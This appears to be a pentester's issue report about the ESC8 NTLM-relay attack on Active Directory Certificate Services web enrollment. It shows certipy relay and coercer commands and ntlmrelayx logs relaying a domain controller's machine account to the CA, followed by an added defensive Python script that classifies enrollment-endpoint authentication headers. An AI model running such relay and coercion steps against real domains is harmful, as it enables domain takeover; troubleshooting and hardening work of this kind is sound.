I don't think this is a Certipy-specific question/problem necessarily, but was hoping to get some assistance to determine if ESC8 can be definitively ruled in or out on this pentest.
I ran Certipy and it reports ESC8 on CA.DOMAIN.COM. I did the `certipy relay -target ca.domain.com -template DomainController -debug`. Then in another window I did `coercer` to get coerced auth going. Even though coercer reports many successful attempts, certipy returns nothing in the relay window. No errors, just nothing.
To sanity check things I used `ntlmrelayx` as the relayer, and it had more info during the relay itself:

```
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 1.2.3.4, attacking target http://ca.domain.com
[*] Status code returned: 403. Authentication does not seem required for URL
[-] No authentication requested by the server for url ca.domain.com
[*] IIS cert server may allow anonymous authentication, sending NTLM auth anyways
[*] HTTP server returned error code 403, treating as a successful login
[*] Authenticating against http://ca.domain.com as domain/dc1$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-9 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[-] Error getting certificate! Make sure you have entered valid certiface template.
[+] No more targets
```
Looking back at my past issue on this, I learned the template name could be called `KerberosAuthentication` or `DC`. When I specify `KerberosAuthentication` I get different output with ntlmrelayx:

```
[*] SMBD-Thread-5 (process_request_thread): Received connection from 1.2.3.4, attacking target http://ca.domain.com
Authenticating against https://ca.domain.com as domain/DC1$ FAILED
```
I'm kind of left with two questions:
1. Any idea why certipy doesn't log anything during either of these relay attempts?
2. Do you have a method using some other tools to validate if the endpoint has been hardened against these attacks? I tried using the `curl` command I've seen in other posts to see if a `WWW-AUTHENTICATE: NTLM` response is returned (and it is!) but I figure I'm missing some other piece here.
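
An added example, not part of the original issue and not code from Certipy or impacket: the header check mentioned in the second question, made systematic so the HTTP and HTTPS responses of the enrollment endpoint are classified separately. The names `classify` and `Finding` are hypothetical and the two sample responses are constructed; response headers alone cannot show whether Extended Protection for Authentication (EPA) is enforced on HTTPS.

```python
from dataclasses import dataclass, field

@dataclass
class Finding:
    status: int
    schemes: list = field(default_factory=list)
    verdict: str = ""

def classify(scheme: str, raw_response: str) -> Finding:
    """scheme is 'http' or 'https'; raw_response is the status line plus headers
    returned to an unauthenticated request (for example, saved curl -i output)."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    status = int(head[0].split()[1])
    # Header names are case-insensitive and IIS sends one line per offered scheme.
    schemes = []
    for line in head[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "www-authenticate" and value.strip():
            schemes.append(value.strip().split()[0].lower())
    # Negotiate can fall back to NTLM, so it counts as NTLM-capable.
    ntlm_capable = any(s in ("ntlm", "negotiate") for s in schemes)
    if status == 401 and ntlm_capable and scheme == "http":
        verdict = "NTLM offered over plain HTTP: no channel binding can apply; disable HTTP enrollment"
    elif status == 401 and ntlm_capable:
        verdict = "NTLM offered over HTTPS: exposure depends on EPA, which headers do not reveal"
    elif status == 401:
        verdict = "challenge offers no NTLM-capable scheme at this URL"
    elif status == 403:
        verdict = "refused before any challenge: no NTLM exchange occurs here; assess the other scheme"
    else:
        verdict = "no authentication challenge observed"
    return Finding(status, schemes, verdict)

# Constructed sample responses (not captured from a real host).
HTTP_403 = "HTTP/1.1 403 Forbidden\r\nServer: Microsoft-IIS/10.0\r\nContent-Length: 1233\r\n\r\n"
HTTPS_401 = ("HTTP/1.1 401 Unauthorized\r\nServer: Microsoft-IIS/10.0\r\n"
             "WWW-Authenticate: Negotiate\r\nwww-authenticate: NTLM\r\n\r\n")

if __name__ == "__main__":
    for scheme, raw in (("http", HTTP_403), ("https", HTTPS_401)):
        f = classify(scheme, raw)
        print(f"{scheme}: {f.status} {f.schemes} -> {f.verdict}")
```

The constructed 403 case matches the status the relay log above reports for the HTTP URL: a refusal with no challenge, which is a different state from a 401 that offers NTLM.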